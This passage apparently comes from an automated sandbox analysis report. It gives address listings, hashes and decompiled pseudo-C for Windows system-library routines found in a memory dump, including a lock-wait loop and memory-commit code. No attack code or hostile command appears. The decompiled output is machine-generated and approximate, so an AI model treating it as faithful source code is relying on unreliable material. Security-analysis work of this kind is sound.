                                                            0x0492be35
                                                            0x0492be39
                                                            0x0492be46
                                                            0x0492be4f
                                                            0x0492be54
                                                            0x0492be56
                                                            0x0492bef8
                                                            0x0492bef8
                                                            0x00000000
                                                            0x0492be5c
                                                            0x0492be5c
                                                            0x0492be60
                                                            0x00000000
                                                            0x0492be66
                                                            0x0492be66
                                                            0x0492be7f
                                                            0x0492be84
                                                            0x0492be87
                                                            0x0492be89
                                                            0x0492be8b
                                                            0x0492be99
                                                            0x0492be9d
                                                            0x0492bea0
                                                            0x0492beac
                                                            0x0492beaf
                                                            0x0492beb1
                                                            0x0492beb3
                                                            0x0492beb3
                                                            0x00000000
                                                            0x0492bea2
                                                            0x0492bea2
                                                            0x00000000
                                                            0x0492bea2
                                                            0x0492be8d
                                                            0x0492be8d
                                                            0x0492be92
                                                            0x00000000
                                                            0x0492be92
                                                            0x0492be8b
                                                            0x0492be60
                                                            0x0492be3b
                                                            0x0492be3b
                                                            0x0492be3e
                                                            0x00000000
                                                            0x0492be40
                                                            0x0492be40
                                                            0x0492be44
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0492be44
                                                            0x0492be3e
                                                            0x0492be29
                                                            0x0492be29
                                                            0x00000000
                                                            0x0492be29
                                                            0x0492be27
                                                            0x00000000
                                                            0x048efba7
                                                            0x048efba7
                                                            0x048efbab
                                                            0x0492bf02
                                                            0x048efbb1
                                                            0x048efbb1
                                                            0x048efbb8
                                                            0x048efbbd
                                                            0x048efbbd
                                                            0x048efbbf
                                                            0x048efbbf
                                                            0x048efbc5
                                                            0x048efbcb
                                                            0x048efbf8
                                                            0x048efbf8
                                                            0x048efbfa
                                                            0x00000000
                                                            0x048efc00
                                                            0x048efc00
                                                            0x048efc03
                                                            0x00000000
                                                            0x048efc09
                                                            0x048efc09
                                                            0x048efc0f
                                                            0x048efc15
                                                            0x048efc23
                                                            0x048efc23
                                                            0x048efc25
                                                            0x048efc27
                                                            0x048efc75
                                                            0x048efc7c
                                                            0x048efc84
                                                            0x00000000
                                                            0x048efc29
                                                            0x048efc29
                                                            0x048efc2d
                                                            0x048efc30
                                                            0x0492bf0f
                                                            0x00000000
                                                            0x048efc36
                                                            0x048efc38
                                                            0x048efc3b
                                                            0x048efc41
                                                            0x0492bf17
                                                            0x0492bf19
                                                            0x0492bf48
                                                            0x0492bf4b
                                                            0x00000000
                                                            0x0492bf1b
                                                            0x0492bf22
                                                            0x0492bf24
                                                            0x0492bf26
                                                            0x00000000
                                                            0x0492bf2c
                                                            0x0492bf37
                                                            0x0492bf39
                                                            0x0492bf3b
                                                            0x00000000
                                                            0x0492bf41
                                                            0x0492bf41
                                                            0x0492bf41
                                                            0x0492bf41
                                                            0x0492bf45
                                                            0x00000000
                                                            0x0492bf45
                                                            0x0492bf3b
                                                            0x0492bf26
                                                            0x00000000
                                                            0x048efc47
                                                            0x048efc47
                                                            0x048efc49
                                                            0x048efcb2
                                                            0x048efcb4
                                                            0x048efcb6
                                                            0x048efcdc
                                                            0x048efcdc
                                                            0x00000000
                                                            0x048efcb8
                                                            0x048efcc3
                                                            0x048efcc5
                                                            0x048efcc7
                                                            0x00000000
                                                            0x048efcc9
                                                            0x048efcc9
                                                            0x048efccd
                                                            0x00000000
                                                            0x048efccd
                                                            0x048efcc7
                                                            0x00000000
                                                            0x048efc4b
                                                            0x048efc4b
                                                            0x048efc4e
                                                            0x048efc4e
                                                            0x048efc51
                                                            0x048efc51
                                                            0x048efc54
                                                            0x048efc5a
                                                            0x048efc5c
                                                            0x048efc5f
                                                            0x048efc61
                                                            0x048efc63
                                                            0x048efc65
                                                            0x048efc67
                                                            0x048efc6e
                                                            0x048efc72
                                                            0x048efc72
                                                            0x048efc72
                                                            0x048efc72
                                                            0x048efc67
                                                            0x048efc61
                                                            0x00000000
                                                            0x048efc5a
                                                            0x048efc49
                                                            0x048efc41
                                                            0x048efc30
                                                            0x048efc27
                                                            0x048efc03
                                                            0x048efbcd
                                                            0x048efbd3
                                                            0x048efbd9
                                                            0x048efbdc
                                                            0x048efbde
                                                            0x048efc99
                                                            0x048efc9b
                                                            0x048efc9d
                                                            0x048efcd5
                                                            0x048efcd5
                                                            0x048efc89
                                                            0x048efc89
                                                            0x00000000
                                                            0x048efc9f
                                                            0x048efc9f
                                                            0x048efca3
                                                            0x00000000
                                                            0x048efca3
                                                            0x00000000
                                                            0x048efbe4
                                                            0x048efbe4
                                                            0x048efbe4
                                                            0x048efbe4
                                                            0x048efbe9
                                                            0x048efbf2
                                                            0x00000000
                                                            0x048efbf2
                                                            0x048efbde
                                                            0x048efbcb
                                                            0x048efbab
                                                            0x048efc8b
                                                            0x048efc8b
                                                            0x048efc8c
                                                            0x048efb80
                                                            0x048efb72
                                                            0x048efb5e
                                                            0x048efc8d
                                                            0x048efc91
                                                            0x048efadf
                                                            0x048efadf
                                                            0x048efae1
                                                            0x048efae4
                                                            0x048efae7
                                                            0x048efaec
                                                            0x048efaf8
                                                            0x048efb00
                                                            0x048efb07
                                                            0x048efb0f
                                                            0x048efb0f
                                                            0x048efb07
                                                            0x00000000
                                                            0x048efaf8
                                                            0x048efadd

                                                            Strings
                                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0492BE0F
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                            • API String ID: 0-865735534
                                                            • Opcode ID: 452d2b55777d1f358c4b879dfc45e599d5c672145293db7f384b64e785cec631
                                                            • Instruction ID: 6ed6f63903ea74e7f53c358f10904a301dffab81bf3e8612d990f8fa0359f3b2
                                                            • Opcode Fuzzy Hash: 452d2b55777d1f358c4b879dfc45e599d5c672145293db7f384b64e785cec631
                                                            • Instruction Fuzzy Hash: 95A10571B00626AFEB21DF6AC4507BAB3E5AF45714F144A79DB06DB680EB74F801CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048B2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 63%
                                                            			E048B2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x49a5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x49a7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E048F97C0();
				}
				if( *0x49a79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x49a79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E048E1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E048D7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0494FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E048F9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E048EE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0490DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x49a6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x49a6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E048F9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E048F95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E048D7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E048D7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04937016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0494FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x49a5350;
							if(_t109 != 0x49a5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0494FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04945720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                            0x048b2d8a
                                                            0x048b2d8a
                                                            0x048b2d92
                                                            0x048b2d96
                                                            0x048b2d9e
                                                            0x048b2da0
                                                            0x048b2da3
                                                            0x048b2da5
                                                            0x048b2da8
                                                            0x048b2dab
                                                            0x048b2db2
                                                            0x0490f9aa
                                                            0x0490f9ab
                                                            0x0490f9ae
                                                            0x0490f9ae
                                                            0x048b2db8
                                                            0x048b2dc2
                                                            0x0490f9b9
                                                            0x0490f9be
                                                            0x0490f9bf
                                                            0x0490f9bf
                                                            0x048b2dcf
                                                            0x0490f9c9
                                                            0x048b2dd5
                                                            0x048b2dd5
                                                            0x048b2dd5
                                                            0x048b2dde
                                                            0x048b2de1
                                                            0x048b2e70
                                                            0x048b2e72
                                                            0x048b2e72
                                                            0x048b2de7
                                                            0x048b2deb
                                                            0x048b2e7c
                                                            0x048b2e83
                                                            0x048b2e85
                                                            0x048b2e8b
                                                            0x048b2e8d
                                                            0x048b2e92
                                                            0x048b2e92
                                                            0x048b2e85
                                                            0x048b2df1
                                                            0x048b2df7
                                                            0x048b2df9
                                                            0x048b2df9
                                                            0x048b2dfc
                                                            0x048b2dff
                                                            0x048b2e02
                                                            0x00000000
                                                            0x048b2e05
                                                            0x048b2e0c
                                                            0x0490f9d9
                                                            0x048b2e12
                                                            0x048b2e12
                                                            0x048b2e12
                                                            0x048b2e1a
                                                            0x0490f9e3
                                                            0x0490f9e9
                                                            0x0490f9f0
                                                            0x0490f9f6
                                                            0x0490f9f8
                                                            0x0490f9f8
                                                            0x0490f9f0
                                                            0x048b2e23
                                                            0x0490fa02
                                                            0x0490fa03
                                                            0x0490fa05
                                                            0x0490fa06
                                                            0x00000000
                                                            0x048b2e29
                                                            0x048b2e29
                                                            0x048b2e2e
                                                            0x048b2e34
                                                            0x048b2e3e
                                                            0x00000000
                                                            0x00000000
                                                            0x048b2e44
                                                            0x048b2e47
                                                            0x048b2e4d
                                                            0x00000000
                                                            0x00000000
                                                            0x048b2e4f
                                                            0x048b2e54
                                                            0x00000000
                                                            0x00000000
                                                            0x048b2e5a
                                                            0x048b2e5f
                                                            0x048b2e9a
                                                            0x048b2ea4
                                                            0x048b2ea5
                                                            0x048b2ea8
                                                            0x048b2eaf
                                                            0x048b2eb2
                                                            0x048b2eb5
                                                            0x0490fae9
                                                            0x0490faeb
                                                            0x0490faed
                                                            0x0490faef
                                                            0x0490faf7
                                                            0x0490faf8
                                                            0x0490fafd
                                                            0x0490faff
                                                            0x0490fb04
                                                            0x0490fb04
                                                            0x0490faff
                                                            0x048b2ec0
                                                            0x048b2ec4
                                                            0x048b2ec6
                                                            0x048b2ec8
                                                            0x0490fb14
                                                            0x0490fb18
                                                            0x0490fb1e
                                                            0x0490fb21
                                                            0x0490fb21
                                                            0x048b2ece
                                                            0x048b2ece
                                                            0x048b2ece
                                                            0x048b2ed7
                                                            0x048b2e61
                                                            0x048b2e63
                                                            0x0490fa6b
                                                            0x0490fa71
                                                            0x0490fa76
                                                            0x0490fa78
                                                            0x0490fa8a
                                                            0x0490fa7a
                                                            0x0490fa83
                                                            0x0490fa83
                                                            0x0490fa8f
                                                            0x0490fa91
                                                            0x0490fa97
                                                            0x0490fa9d
                                                            0x0490faa4
                                                            0x0490faaa
                                                            0x0490faaf
                                                            0x0490fab1
                                                            0x0490fac3
                                                            0x0490fab3
                                                            0x0490fabc
                                                            0x0490fabc
                                                            0x0490fac8
                                                            0x0490facb
                                                            0x0490fadf
                                                            0x0490fadf
                                                            0x0490facb
                                                            0x0490faa4
                                                            0x0490fa91
                                                            0x048b2e6f
                                                            0x048b2e6f
                                                            0x048b2e5f
                                                            0x0490fa13
                                                            0x0490fa15
                                                            0x0490fa17
                                                            0x0490fa1f
                                                            0x0490fa21
                                                            0x0490fa22
                                                            0x0490fa25
                                                            0x0490fa28
                                                            0x0490fa2f
                                                            0x0490fa2f
                                                            0x0490fa2a
                                                            0x0490fa2a
                                                            0x0490fa2a
                                                            0x0490fa31
                                                            0x0490fa34
                                                            0x0490fa36
                                                            0x0490fa3c
                                                            0x0490fa3e
                                                            0x0490fa41
                                                            0x0490fa43
                                                            0x0490fa45
                                                            0x0490fa45
                                                            0x0490fa41
                                                            0x0490fa3c
                                                            0x0490fa4a
                                                            0x0490fa4f
                                                            0x0490fa51
                                                            0x0490fa53
                                                            0x0490fa56
                                                            0x0490fa5b
                                                            0x0490fa5e
                                                            0x00000000
                                                            0x0490fa5e
                                                            0x048b2e23

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Re-Waiting
                                                            • API String ID: 0-316354757
                                                            • Opcode ID: 8e9c5c1e3a0945a3d55ceb0ecea08869dc3278dbdf67a93f3fcb276421a996c4
                                                            • Instruction ID: 536b94fdbe9b0975a4eaf3dad5e6695361bf6c10507651b26c3c97d1529c55cb
                                                            • Opcode Fuzzy Hash: 8e9c5c1e3a0945a3d55ceb0ecea08869dc3278dbdf67a93f3fcb276421a996c4
                                                            • Instruction Fuzzy Hash: 8561F231A006489FEB31DF68C848BAE77A9EB84318F144BA5D451D73C1E7B4BA4087D1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04980EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 80%
                                                            			E04980EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0497FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E04981074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E048F9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0497A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0497A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x49a8b04 >> 0x14) + (_v44 -  *0x49a8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E048D7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0497138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E048D7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0496FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x49a8724 & 0x00000008) != 0) {
						E049752F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E049815B5(0x49a8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                            0x04980eb7
                                                            0x04980eb9
                                                            0x04980ec0
                                                            0x04980ec2
                                                            0x04980ecd
                                                            0x0498105b
                                                            0x0498105b
                                                            0x04981061
                                                            0x04981066
                                                            0x04981066
                                                            0x0498106b
                                                            0x04981073
                                                            0x04981073
                                                            0x04980ed3
                                                            0x04980ed6
                                                            0x04980edc
                                                            0x04980ee0
                                                            0x04980ee7
                                                            0x04980ef0
                                                            0x04980ef5
                                                            0x04980efa
                                                            0x04980efc
                                                            0x04980efd
                                                            0x04980f03
                                                            0x04980f04
                                                            0x04980f06
                                                            0x04980f07
                                                            0x04980f09
                                                            0x04980f0e
                                                            0x04980f14
                                                            0x04980f23
                                                            0x04980f2d
                                                            0x04980f34
                                                            0x04980f34
                                                            0x04980f14
                                                            0x04980f52
                                                            0x00000000
                                                            0x00000000
                                                            0x04980f58
                                                            0x04980f73
                                                            0x04980f74
                                                            0x04980f79
                                                            0x04980f7d
                                                            0x04980f80
                                                            0x04980f86
                                                            0x04980fab
                                                            0x04980fb5
                                                            0x04980fc6
                                                            0x04980fd1
                                                            0x04980fe3
                                                            0x04980fd3
                                                            0x04980fdc
                                                            0x04980fdc
                                                            0x04980feb
                                                            0x04981009
                                                            0x04981009
                                                            0x04981015
                                                            0x04981027
                                                            0x04981017
                                                            0x04981020
                                                            0x04981020
                                                            0x0498102f
                                                            0x0498103c
                                                            0x0498103c
                                                            0x04981048
                                                            0x04981050
                                                            0x04981050
                                                            0x04981055
                                                            0x00000000
                                                            0x04981055
                                                            0x04980f88
                                                            0x04980f9e
                                                            0x04980fa2
                                                            0x04980fa9
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04980fa9
                                                            0x00000000

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-2679148245
                                                            • Opcode ID: 013542eac777d2425e8ff47f87d7f87937520aac19dd9847ee7e540000c3d0dc
                                                            • Instruction ID: 287f4b1d3e673f82ab626e18b791a5f7b749c9f80cafef9f09de5da89ada7f72
                                                            • Opcode Fuzzy Hash: 013542eac777d2425e8ff47f87d7f87937520aac19dd9847ee7e540000c3d0dc
                                                            • Instruction Fuzzy Hash: ED518C712043419FE325EF28D885B1BB7E9EBC4708F044A3DF99697291D675F80ACB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048EF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 76%
                                                            			E048EF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E048D4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E048F9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E048F9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E048F95D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x371eb81a
							_t109 = L048D4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2000371e
								E048FF3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2000371e
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E048F95D0();
										L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                            0x048ef0d3
                                                            0x048ef0d9
                                                            0x048ef0e0
                                                            0x048ef0e7
                                                            0x048ef0f2
                                                            0x048ef0f4
                                                            0x048ef0f8
                                                            0x048ef100
                                                            0x048ef108
                                                            0x048ef10d
                                                            0x048ef115
                                                            0x048ef116
                                                            0x048ef11f
                                                            0x048ef123
                                                            0x048ef124
                                                            0x048ef12c
                                                            0x048ef130
                                                            0x048ef134
                                                            0x048ef13d
                                                            0x048ef144
                                                            0x048ef14b
                                                            0x048ef152
                                                            0x0492bab0
                                                            0x0492bab0
                                                            0x048ef158
                                                            0x048ef158
                                                            0x048ef15a
                                                            0x048ef160
                                                            0x048ef165
                                                            0x048ef166
                                                            0x048ef16f
                                                            0x048ef173
                                                            0x0492baa7
                                                            0x0492baa7
                                                            0x0492baab
                                                            0x00000000
                                                            0x048ef179
                                                            0x048ef179
                                                            0x048ef18d
                                                            0x048ef191
                                                            0x0492baa2
                                                            0x00000000
                                                            0x048ef197
                                                            0x048ef19b
                                                            0x048ef1a2
                                                            0x048ef1a9
                                                            0x048ef1af
                                                            0x048ef1b2
                                                            0x048ef1b6
                                                            0x048ef1b9
                                                            0x048ef1c0
                                                            0x048ef1c4
                                                            0x048ef1d8
                                                            0x048ef1df
                                                            0x048ef1e3
                                                            0x048ef1e6
                                                            0x048ef1eb
                                                            0x048ef1ee
                                                            0x048ef1f4
                                                            0x048ef20f
                                                            0x0492bab7
                                                            0x0492babb
                                                            0x0492bacc
                                                            0x0492bad1
                                                            0x048ef215
                                                            0x048ef218
                                                            0x048ef226
                                                            0x048ef22b
                                                            0x00000000
                                                            0x048ef22b
                                                            0x048ef1f6
                                                            0x048ef1f6
                                                            0x048ef1f9
                                                            0x048ef1fb
                                                            0x048ef1fb
                                                            0x048ef1f4
                                                            0x048ef191
                                                            0x048ef173
                                                            0x048ef152
                                                            0x048ef203

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                            • Instruction ID: df39696242fa51f17a7296c84c62cd2c1abb92700f83b7f237bef4bb890d2335
                                                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                            • Instruction Fuzzy Hash: CD515B71605714AFD321DF19C840A6BBBF8FF48714F008A2AFA95D7690E7B4E914CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04933540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 75%
                                                            			E04933540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
